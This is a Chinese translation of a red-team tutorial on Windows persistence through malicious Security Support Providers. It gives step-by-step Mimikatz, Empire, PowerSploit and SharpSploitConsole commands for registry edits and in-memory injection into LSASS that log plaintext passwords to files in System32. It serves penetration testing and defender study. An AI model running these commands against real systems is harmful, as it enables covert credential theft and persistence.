Window权限维持（七）：安全支持提供者

安全支持提供程序（SSP）是Windows API，用于扩展Windows身份验证机制。LSASS进程正在Windows启动期间加载安全支持提供程序DLL。这种行为使红队的攻击者可以删除一个任意的SSP DLL以便与LSASS进程进行交互并记录该进程中存储的所有密码，或者直接用恶意的SSP对该进程进行修补而无需接触磁盘。
该技术可用于收集一个系统或多个系统中的凭据，并将这些凭据与另一个协议（例如RDP，WMI等）结合使用，以免干扰检测，从而在网络中保持持久性。向主机注入恶意安全支持提供程序需要管理员级别的特权，并且可以使用两种方法：

1. 1. 　　注册SSP DLL
   2. 　　加载到内存

Mimikatz，Empire和PowerSploit支持这两种方法，可以在红队操作中使用。

Mimikatz

项目Mimikatz提供了一个DLL文件（mimilib.dll），可以将其放到与LSASS进程（System32）相同的位置，以便为访问受感染主机的任何用户获得纯文本凭据。

C:\Windows\System32\

将文件传输到上述位置后，需要修改注册表项以包括新的安全支持提供程序mimilib。

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ

​

SSP – mimilib注册表

查看“安全软件包”注册表项将验证是否已注入恶意安全支持提供程序。

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages

​

注册表–安全软件包

由于注册表已被篡改并且DLL存储在系统中，因此该方法将在重新启动后继续存在。当域用户再次通过系统进行身份验证时，将创建一个名为kiwissp的新文件，该文件将记录帐户的凭据。

C:\Windows\System32\kiwissp.log

Mimikatz – kiwissp

另外，Mimikatz通过向LSASS注入新的安全支持提供程序（SSP）来支持内存技术选项。此技术不需要将mimilib.dll放入磁盘或创建注册表项。但是，缺点是在重新启动过程中不会持续存在。

privilege::debug
misc::memssp

​

Mimikatz –内存中的SSP

当用户再次通过系统进行身份验证时，将在System32中创建一个日志文件，其中将包含纯文本用户密码。

C:\Windows\System32\mimilsa.log

​

Mimikatz – mimilsa

Empire

Empire提供了两个模块，可用于枚举现有的SSP并在目标系统上安装恶意的SSP。默认情况下，枚举模块将使用活动代理，并且不需要任何其他配置。

usemodule persistence/misc/get_ssps
execute

​

Empire – SSP 枚举

同样，直接查询注册表可以获取存在的SSP的值。

shell reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

​

注册表SSP的枚举注册表

将恶意安全支持提供程序复制到System32并更新注册表项将结束该技术。

shell copy mimilib.dll C:\Windows\System32\

​

将mimilib.dll复制到System32

由于Empire包含一个模块，该过程可以自动进行，该模块将自动将DLL文件复制到System32并创建注册表项。唯一的要求是在主机上设置mimilib.dll文件的路径。

usemodule persistence/misc/install_ssp*
set Path C:\Users\Administrator\mimilib.dll
execute

​ Empire SSP安装

Empire还支持可以执行自定义Mimikatz命令的脚本。

usemodule credentials/mimikatz/command
set Command misc::memssp
execute

​

Mimikatz – SSP命令

Empire还支持在进程的内存中注入恶意SSP。下面的模块将调用Mimikatz脚本并直接执行memssp命令，作为使该技术自动化的另一种方法。

usemodule persistence/misc/memssp*
execute

​

Empire – memssp

PowerSploit

PowerSploit包含两个可以执行相同任务的脚本。在Mimikatz的PowerShell变体“ Invoke-Mimikatz ”中，执行以下命令将使用内存中技术。

Import-Module .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command "misc::memssp"

​

PowerSploit – Mimikatz SSP

或者，将恶意的SSP DDL文件传输到目标主机并使用模块Install-SSP将DLL复制到System32，并将自动修改相关的注册表项。

Import-Module .\PowerSploit.psm1
Install-SSP -Path .\mimilib.dll

​

PowerSploit –安装SSP

SharpSploitConsole

Mimikatz已集成到SharpSploitConsole中，该应用程序旨在与Ryan Cobb发布的SharpSploit进行交互。SharpSploit是一个.NET后期开发库，具有与PowerSploit类似的功能。当前，SharpSploitConsole通过Mimikatz模块支持内存技术。

SharpSploitConsole_x64.exe Interact
Mimi-Command misc::memssp

​

SharpSploitConsole – memssp

译文声明：本文由Bypass整理并翻译，仅用于安全研究和学习之用。

原文地址：https://pentestlab.blog/2019/10/21/persistence-security-support-provider/

​